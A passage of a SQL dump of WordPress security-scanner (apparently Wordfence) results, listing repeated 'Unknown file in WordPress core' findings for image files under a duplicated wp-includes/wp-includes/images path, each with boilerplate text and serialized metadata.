href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/media/code.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26982,1631424890,1631424890,'new','knownfile',75,'8b2cfd91a55fa69a53e06a61d9a30157','ac47425d045753b432f91792368e1e61','Unknown file in WordPress core: wp-includes/wp-includes/images/media/default.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/images/media/default.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26983,1631424890,1631424890,'new','knownfile',75,'2310501c686351d29455e89a2d13f207','674520148ba5639be10acbed92fb2483','Unknown file in WordPress core: wp-includes/wp-includes/images/media/document.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/images/media/document.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26984,1631424890,1631424890,'new','knownfile',75,'eae3488532bb74c52c40933fe5a457b8','56776aad8e63861f3f544b3227b4f8a1','Unknown file in WordPress core: wp-includes/wp-includes/images/media/interactive.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/media/interactive.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26985,1631424890,1631424890,'new','knownfile',75,'1632314f3bff55e31a623fe449c4e82c','b1d68e4fbefc2b5d6f3b1a7334169f09','Unknown file in WordPress core: wp-includes/wp-includes/images/media/spreadsheet.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/media/spreadsheet.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26986,1631424890,1631424890,'new','knownfile',75,'70f902682a9b0bcf133fb4f54182f6b8','6afe7764d4795e5a1acbf74bdeb67726','Unknown file in WordPress core: wp-includes/wp-includes/images/media/text.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/media/text.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26987,1631424890,1631424890,'new','knownfile',75,'6f5c43372c266c8c6007027a1dc0e4fc','afbb2a6e912cb9fef48a50cfa347625a','Unknown file in WordPress core: wp-includes/wp-includes/images/media/video.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/media/video.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26988,1631424890,1631424890,'new','knownfile',75,'6531a30f81336b45d13a08c29cab06f0','e35708736def021f11239257bd015e9d','Unknown file in WordPress core: wp-includes/wp-includes/images/rss-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/rss-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26989,1631424890,1631424890,'new','knownfile',75,'7eb9c94d7823740a2ffc879ca4ba8987','27caf51464222d98203807a533b5d24d','Unknown file in WordPress core: wp-includes/wp-includes/images/rss.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/images/rss.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26990,1631424890,1631424890,'new','knownfile',75,'7447661fa0d827223a9d8366b2b0ee09','13e16a460355010574fc3fbb8f0e7b3a','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/frownie.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/smilies/frownie.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26991,1631424890,1631424890,'new','knownfile',75,'709eac71ca2a542d613ebd360a75d3f6','789c7380f78db9f89a95be9fc7b73d26','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_arrow.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/smilies/icon_arrow.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26992,1631424891,1631424891,'new','knownfile',75,'2d6032a218ef3812c153b86a99c7ddde','a0fa2e00b7b002e685afd5b8c7f1df4a','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_biggrin.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_biggrin.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26993,1631424891,1631424891,'new','knownfile',75,'e3449acb9e1f0d1686992dbff342a803','1bcbed50c8a598fb1dc3160b0e55d077','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_confused.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_confused.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26994,1631424891,1631424891,'new','knownfile',75,'adfabbe2648a0133c5cb2c0eb1a6e520','842f22bb8a3b8054cafaa498663aa253','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_cool.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_cool.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26995,1631424891,1631424891,'new','knownfile',75,'a8628938ae77481c062268144e9243f5','70032ca3dcebe1bdcc93bca354b68812','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_cry.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_cry.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26996,1631424891,1631424891,'new','knownfile',75,'a277ba3b112ecd4fdc07ca0322ca425f','8c83be9c3eee076a98e751909f6bdef6','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_eek.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_eek.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26997,1631424891,1631424891,'new','knownfile',75,'0ab3012409f843b523fcc7d2c82fb0b2','bb6a5b89b855c6655ed1528039d79687','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_evil.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_evil.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26998,1631424891,1631424891,'new','knownfile',75,'7a42490a29678a03b67bb322fa9cf2b2','e617d647225180e6fe3b61e6809c1245','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_exclaim.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_exclaim.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26999,1631424891,1631424891,'new','knownfile',75,'f1ae79b2a2bcd3fd59f99fcee5a98a83','24b04c1580c9e7a9c4cdfda744eddf73','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_idea.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_idea.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27000,1631424891,1631424891,'new','knownfile',75,'1a3767d4985c4dbb77411a3380f74a6a','b5ae4c64b5c52d736b9b9d1822aadc42','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_lol.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_lol.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27001,1631424891,1631424891,'new','knownfile',75,'09ad9906f8325fb2dfd1996232a323d1','e77780ba73ec0c9f84a759efac0e1193','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_mad.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_mad.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27002,1631424891,1631424891,'new','knownfile',75,'2bd89291d24b1ac4df813a6d8891241e','c158941a5d7b0257d923bbcbd0724897','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_mrgreen.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_mrgreen.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27003,1631424891,1631424891,'new','knownfile',75,'0e4a931bdb5744f2056b40fb95ad7036','821d234d578601f266f39eb8179fafd4','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_neutral.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_neutral.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27004,1631424891,1631424891,'new','knownfile',75,'bf6588d8a02a73b738bc9a74838ae1a7','53825fbecd4f3e830ec3069017478123','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_question.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_question.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27005,1631424891,1631424891,'new','knownfile',75,'87eee4fdaf975d08ac33b5b23d67a339','75e1c7e0bb249ef749f43f09482e1aee','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_razz.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_razz.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27006,1631424891,1631424891,'new','knownfile',75,'2d8bea8a6305b1612c501a08760a16e7','4d04dccf56220e84d3a62f7f971255eb','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_redface.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_redface.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27007,1631424891,1631424891,'new','knownfile',75,'331753072b516ba1111df40a6f355b9c','05f0750108326573212d8ed661051225','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_rolleyes.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_rolleyes.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27008,1631424891,1631424891,'new','knownfile',75,'5952e8684cecd3602d538919737a8ebc','fbf0bc98b0b1aa14be140eb3453eb8c0','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_sad.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_sad.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27009,1631424891,1631424891,'new','knownfile',75,'c928b96c7e9eed8b90ce3f4ab42854ec','1098aeea16423129e61c0441d1196ea7','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_smile.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/smilies/icon_smile.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27010,1631424891,1631424891,'new','knownfile',75,'bfc8d4dac1c9bc3c0b82897c22238872','75b126f943f751baf61751f24938c459','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_surprised.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/images/smilies/icon_surprised.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27011,1631424892,1631424892,'new','knownfile',75,'f3a516022d877a1c86a97af85231da74','33e2c44de46a8ffb80c398c0a1ebe0b6','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_twisted.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_twisted.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27012,1631424892,1631424892,'new','knownfile',75,'5539d860a843d81a3c54cd741e500160','d26701119cbb2d06abac1c66fb474828','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_wink.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_wink.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27013,1631424892,1631424892,'new','knownfile',75,'eecd7a9a2df3b25c969d30ed7feaa3df','cb140fa1eff5056ff3c0acf75f2a34ab','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/mrgreen.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/smilies/mrgreen.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27014,1631424892,1631424892,'new','knownfile',75,'1432ab7f03bc6a570ca9fe735d4e4a78','6533191dd61d2472fa0ae401115efad3','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/rolleyes.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/rolleyes.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27015,1631424892,1631424892,'new','knownfile',75,'53a123e6ad19f3c3e4d0ff3ffa273d8f','7c21af4de499404b8aa1abee4850dbb0','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/simple-smile.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/simple-smile.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27016,1631424892,1631424892,'new','knownfile',75,'3f0259ecf1724186ca29c652fe412e09','36dd03b8f7315422ebd3ade18eba9486','Unknown file in WordPress core: wp-includes/wp-includes/images/spinner-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/spinner-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27017,1631424892,1631424892,'new','knownfile',75,'0de165ea9cec08b316b97df7e27f9460','085bdeb218991f9b985477df6396fa7f','Unknown file in WordPress core: wp-includes/wp-includes/images/spinner.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/images/spinner.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27018,1631424892,1631424892,'new','knownfile',75,'f482f23ac9eb35447ecccc9827b3e4dc','7f89e984b37d2553c35cb9f57353ebb5','Unknown file in WordPress core: wp-includes/wp-includes/images/toggle-arrow-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/toggle-arrow-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27019,1631424892,1631424892,'new','knownfile',75,'2c583f3ff8a8fc7363be7a3aba17e3c8','3719825f22e69192792bc5d4d2a79c1b','Unknown file in WordPress core: wp-includes/wp-includes/images/toggle-arrow.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/toggle-arrow.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27020,1631424892,1631424892,'new','knownfile',75,'801b94ddc4bb3aae1fc161f627bab64b','5acfeb975079bfd2c8235f2f90adae05','Unknown file in WordPress core: wp-includes/wp-includes/images/uploader-icons-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/uploader-icons-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27021,1631424892,1631424892,'new','knownfile',75,'3c07562cf35f65d61dbda600dbc93bb1','82ef2d04489fbc066ecae98cbe9183d5','Unknown file in WordPress core: wp-includes/wp-includes/images/uploader-icons.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 